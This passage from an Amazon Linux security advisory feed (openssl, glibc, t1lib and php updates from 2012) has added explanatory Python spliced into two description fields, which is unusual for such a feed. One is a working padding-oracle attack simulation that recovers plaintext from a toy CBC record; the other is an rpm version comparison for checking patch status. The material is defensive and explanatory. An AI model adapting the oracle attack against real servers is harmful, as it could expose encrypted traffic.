arch="x86_64"><filename>Packages/php-debuginfo-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.9" release="1.9.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-devel-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.9-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-38</id><title>Amazon Linux - ALAS-2012-38: medium priority package update for openssl</title><issued date="2012-02-02 14:24:00" /><updated date="2014-09-14 15:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following 
vulnerabilities:
CVE-2011-4619:
The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors.
It was discovered that OpenSSL did not limit the number of TLS/SSL handshake restarts required to support Server Gated Cryptography. A remote attacker could use this flaw to make a TLS/SSL server using OpenSSL consume an excessive amount of CPU by continuously restarting the handshake.
CVE-2011-4577:
OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers.
A denial of service flaw was found in the RFC 3779 implementation in OpenSSL. A remote attacker could use this flaw to make an application using OpenSSL exit unexpectedly by providing a specially-crafted X.509 certificate that has malformed RFC 3779 extension data.
CVE-2011-4576:
The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer.
An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. Incorrect initialization of SSL record padding bytes could cause an SSL client or server to send a limited amount of possibly sensitive data to its SSL peer via the encrypted connection.
CVE-2011-4108:
The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL leaked timing information when performing certain operations. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a DTLS server as a padding oracle.
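The two CVE-2011-4108 paragraphs above describe a record check that runs the MAC only when the padding is valid, which lets an attacker who can measure response time tell the two failure cases apart; in DTLS a rejected record does not end the session, so the probe can be repeated as often as needed. The Python below is an added example, not code from OpenSSL or from this advisory: it models a CBC record with a toy block cipher (assumed here purely so the example runs offline; it is not a real cipher) and HMAC-SHA256, counts MAC computations in place of the attacker's timing measurement, and recovers one plaintext block through the leaky check. The corrected check always performs the MAC, so the same probes return no information.

```python
import hashlib, hmac, os

BLOCK, MAC_LEN = 16, 32            # CBC block size, HMAC-SHA256 tag length

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 16-byte bijection, assumed here only so CBC runs offline; it is not a cipher. The attack
# treats it as a black box, which is exactly why a padding oracle is cipher-independent.
def _blk_enc(key, x):
    y = _xor(x, hashlib.sha256(b"blk" + key).digest())
    return y[1:] + y[:1]

def _blk_dec(key, y):
    return _xor(y[-1:] + y[:-1], hashlib.sha256(b"blk" + key).digest())

def encrypt_record(enc_key, mac_key, plaintext):
    """TLS/DTLS-style record: MAC, pad with n bytes each valued n-1, then CBC-encrypt."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha256).digest()
    n = BLOCK - len(body) % BLOCK
    padded = body + bytes([n - 1]) * n
    iv = os.urandom(BLOCK)
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = _blk_enc(enc_key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out

def cbc_decrypt(enc_key, record):
    iv, ct = record[:BLOCK], record[BLOCK:]
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(_blk_dec(enc_key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def _padding_ok(padded):
    n = padded[-1] + 1
    return len(padded) - MAC_LEN >= n and padded[-n:] == bytes([n - 1]) * n

def _mac_ok(mac_key, padded, n):
    end = len(padded) - n
    tag = hmac.new(mac_key, padded[:end - MAC_LEN], hashlib.sha256).digest()
    return hmac.compare_digest(tag, padded[end - MAC_LEN:end])

def verify_vulnerable(enc_key, mac_key, record, work):
    """Ordering the advisory describes: MAC checked only if padding is valid, so a bad-padding record returns before any HMAC work (counted in work["mac"])."""
    padded = cbc_decrypt(enc_key, record)
    if not _padding_ok(padded):
        return False
    work["mac"] += 1
    return _mac_ok(mac_key, padded, padded[-1] + 1)

def verify_fixed(enc_key, mac_key, record, work):
    """Corrected ordering: always run the MAC (bad padding treated as none), then fail; both rejections cost the same."""
    padded = cbc_decrypt(enc_key, record)
    pad_ok = _padding_ok(padded)
    work["mac"] += 1
    mac_ok = _mac_ok(mac_key, padded, padded[-1] + 1 if pad_ok else 0)
    return pad_ok and mac_ok

def make_oracle(verify, enc_key, mac_key):
    """The attacker's view of one probe: did the server do the slow MAC step? (stands in for timing)"""
    def oracle(record):
        work = {"mac": 0}
        verify(enc_key, mac_key, record, work)
        return work["mac"] == 1
    return oracle

def recover_block(oracle, prev_block, target_block):
    """Recover one CBC block's plaintext from oracle answers alone. Two junk blocks are
    prepended so the forged record is long enough to hold a MAC plus padding."""
    known, filler = bytearray(BLOCK), bytes(2 * BLOCK)
    for j in range(1, BLOCK + 1):          # force j padding bytes valued j-1, last byte first
        padbyte = j - 1
        for g in range(256):
            c = bytearray(prev_block)
            c[-j] = prev_block[-j] ^ g ^ padbyte
            for k in range(1, j):
                c[-k] = prev_block[-k] ^ known[-k] ^ padbyte
            if not oracle(filler + bytes(c) + target_block):
                continue
            if j == 1:                     # exclude an accidental longer valid padding
                c2 = bytearray(c); c2[-2] ^= 1
                if not oracle(filler + bytes(c2) + target_block):
                    continue
            known[-j] = g
            break
        else:
            raise RuntimeError("no byte accepted: the check is not acting as an oracle")
    return bytes(known)

def demo(enc_key=b"enc-key", mac_key=b"mac-key", msg=b"secret block 16!"):
    """Returns (plaintext recovered through the leaky check, whether the fixed check stays silent)."""
    rec = encrypt_record(enc_key, mac_key, msg)
    leaky = make_oracle(verify_vulnerable, enc_key, mac_key)
    recovered = recover_block(leaky, rec[:BLOCK], rec[BLOCK:2 * BLOCK])
    quiet = make_oracle(verify_fixed, enc_key, mac_key)
    tampered = bytearray(rec); tampered[-1] ^= 0xFF
    return recovered, quiet(rec) == quiet(bytes(tampered))
```

recover_block never touches the key or the block cipher; it needs only the yes/no answer of make_oracle, which is why the fix has to remove the observable difference between the two rejections rather than protect key material. demo() returns the 16-byte plaintext together with True, showing that the same tampered record is indistinguishable from a genuine one once the MAC is always computed.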
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4108" title="" id="CVE-2011-4108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4576" title="" id="CVE-2011-4576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4577" title="" id="CVE-2011-4577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4619" title="" id="CVE-2011-4619" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0059.html" title="" id="RHSA-2012:0059" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0g-1.26.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0g" release="1.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/openssl-devel-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0g" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0g-1.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-39</id><title>Amazon Linux - ALAS-2012-39: medium priority package update for glibc</title><issued date="2012-02-02 14:26:00" /><updated date="2014-09-14 15:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4609:
A denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time.
CVE-2009-5029:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029" title="" id="CVE-2009-5029" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4609" title="" id="CVE-2011-4609" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0058.html" title="" id="RHSA-2012:0058" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-debuginfo-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.47.32.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.12" release="1.47.32.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.47.32.amzn1.i686.rpm</filename></package><package 
name="glibc-devel" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.47.32.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.47.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.47.32.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-40</id><title>Amazon Linux - ALAS-2012-40: medium priority package update for t1lib</title><issued date="2012-02-02 14:26:00" /><updated date="2014-09-14 15:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following 
vulnerabilities:
CVE-2011-1554:
Off-by-one error in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory read, integer overflow, and invalid pointer dereference, a different vulnerability than CVE-2011-0764.
An off-by-one flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib (such as teTeX or a TeX Live utility) to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2011-1553:
Use-after-free vulnerability in t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, allows remote attackers to cause a denial of service (application crash) via a PDF document containing a crafted Type 1 font that triggers an invalid memory write, a different vulnerability than CVE-2011-0764.
A use-after-free flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib (such as teTeX or a TeX Live utility) to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2011-1552:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, reads from invalid memory locations, which allows remote attackers to cause a denial of service (application crash) via a crafted Type 1 font in a PDF document, a different vulnerability than CVE-2011-0764.
An out-of-bounds memory read flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib (such as teTeX or a TeX Live utility) to crash.
CVE-2011-0764:
t1lib 5.1.2 and earlier, as used in Xpdf before 3.02pl6 and other products, uses an invalid pointer in conjunction with a dereference operation, which allows remote attackers to execute arbitrary code via a crafted Type 1 font in a PDF document, as demonstrated by testz.2184122398.pdf.
An invalid pointer dereference flaw was found in t1lib. A specially-crafted font file could, when opened, cause an application linked against t1lib (such as teTeX or a TeX Live utility) to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2010-2642:
Two heap-based buffer overflow flaws were found in the way t1lib processed Adobe Font Metrics (AFM) files. If a specially-crafted font file was opened by an application linked against t1lib (such as teTeX or a TeX Live utility), it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Heap-based buffer overflow in the AFM font parser in the dvi-backend component in Evince 2.32 and earlier, teTeX 3.0, t1lib 5.1.2, and possibly other products allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font in conjunction with a DVI file that is processed by the thumbnailer.
A heap-based buffer overflow flaw was found in the DVI renderer's AFM font file parser. A DVI file that references a specially-crafted font file could, when opened, cause Evince to crash or, potentially, execute arbitrary code with the privileges of the user running Evince.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2642" title="" id="CVE-2010-2642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0764" title="" id="CVE-2011-0764" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1552" title="" id="CVE-2011-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1553" title="" id="CVE-2011-1553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1554" title="" id="CVE-2011-1554" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0062.html" title="" id="RHSA-2012:0062" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="t1lib-debuginfo" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-debuginfo-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-static" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-static-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-devel" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-devel-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-apps" version="5.1.2" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/t1lib-apps-5.1.2-6.5.amzn1.i686.rpm</filename></package><package name="t1lib-static" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-static-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib-debuginfo" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-debuginfo-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib-apps" 
version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-apps-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib-devel" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-devel-5.1.2-6.5.amzn1.x86_64.rpm</filename></package><package name="t1lib" version="5.1.2" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1lib-5.1.2-6.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-41</id><title>Amazon Linux - ALAS-2012-41: critical priority package update for php</title><issued date="2012-02-02 16:10:00" /><updated date="2014-09-14 15:16:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0830:
The php_register_variable_ex function in php_variables.c in PHP 5.3.9 allows remote attackers to execute arbitrary code via a request containing a large number of variables, related to improper handling of array variables. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4885.
It was discovered that the fix for CVE-2011-4885 (released via RHSA-2012:0071, RHSA-2012:0033, and RHSA-2012:0019 for php packages in Red Hat Enterprise Linux 4, 5, and 6 respectively, and via RHSA-2012:0019 for php53 packages in Red Hat Enterprise Linux 5) introduced an uninitialized memory use flaw. A remote attacker could send a specially-crafted HTTP request to cause the PHP interpreter to crash or, possibly, execute arbitrary code.
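Because CVE-2012-0830 is a regression introduced by the CVE-2011-4885 fix, a host already carrying php-5.3.9-1.9.amzn1 from the earlier advisory on this page is patched for one CVE and still open to the other until php-5.3.10-1.15.amzn1 is installed; whether an advisory applies is decided by comparing the installed epoch, version and release against the package entries in this file. The Python below is an added example, not yum's or rpm's own code: a port of rpm's version-comparison rule plus an epoch-version-release check, fed with the two fixed-in versions taken from this file. The CVE-to-version table is constructed for the example, and the '^' rule of newer rpm releases is left out.

```python
def _run(s, k, digits):
    """The maximal digit run (or letter run) of s starting at index k."""
    n = k
    while n != len(s) and (s[n].isdigit() if digits else s[n].isalpha()):
        n += 1
    return s[k:n]

def rpmvercmp(a, b):
    """Segment-wise comparison as rpm does it: 1 if a is newer, -1 if older, 0 if equal.
    Digit runs compare numerically, letter runs lexically, a digit run beats a letter run,
    separators carry no weight, and '~' sorts before everything including end of string."""
    if a == b:
        return 0
    i = j = 0
    while i != len(a) or j != len(b):
        while i != len(a) and not (a[i].isalnum() or a[i] == "~"):
            i += 1
        while j != len(b) and not (b[j].isalnum() or b[j] == "~"):
            j += 1
        ta, tb = a[i:i + 1] == "~", b[j:j + 1] == "~"
        if ta or tb:
            if not ta:
                return 1
            if not tb:
                return -1
            i += 1
            j += 1
            continue
        if i == len(a) or j == len(b):
            break
        digits = a[i].isdigit()
        sa, sb = _run(a, i, digits), _run(b, j, digits)
        if not sb:                      # other side starts with the other kind of run
            return 1 if digits else -1
        i += len(sa)
        j += len(sb)
        if digits:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i == len(a) and j == len(b):
        return 0
    return -1 if i == len(a) else 1     # whichever side still has characters left is newer

def evr_cmp(x, y):
    """Compare two (epoch, version, release) triples, epoch first, as the package resolver does."""
    ex, ey = int(x[0]), int(y[0])
    if ex != ey:
        return 1 if ex > ey else -1
    r = rpmvercmp(x[1], y[1])
    return r if r != 0 else rpmvercmp(x[2], y[2])

# Fixed-in EVRs taken from this file (table constructed for the example): the php
# 5.3.9-1.9.amzn1 advisory whose package list ends above, and ALAS-2012-41.
FIXES = {
    "CVE-2011-4885": ("0", "5.3.9", "1.9.amzn1"),
    "CVE-2012-0830": ("0", "5.3.10", "1.15.amzn1"),
}

def open_cves(installed_evr, fixes=FIXES):
    """CVEs whose fixed-in EVR is newer than the installed one."""
    return sorted(cve for cve, fix in fixes.items() if evr_cmp(installed_evr, fix) == -1)

if __name__ == "__main__":
    print(open_cves(("0", "5.3.9", "1.9.amzn1")))   # host patched only up to the CVE-2011-4885 fix
```

Epoch is compared before anything else, which is why an entry such as the mod_ssl packages with epoch 1 elsewhere in this file outranks any epoch-0 build regardless of version string; for the php case, open_cves reports CVE-2012-0830 for a host at 5.3.9-1.9.amzn1 and nothing for one at 5.3.10-1.15.amzn1.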
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830" title="" id="CVE-2012-0830" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0093.html" title="" id="RHSA-2012:0093" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-pgsql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-soap" 
version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.10" release="1.15.amzn1" epoch="0" 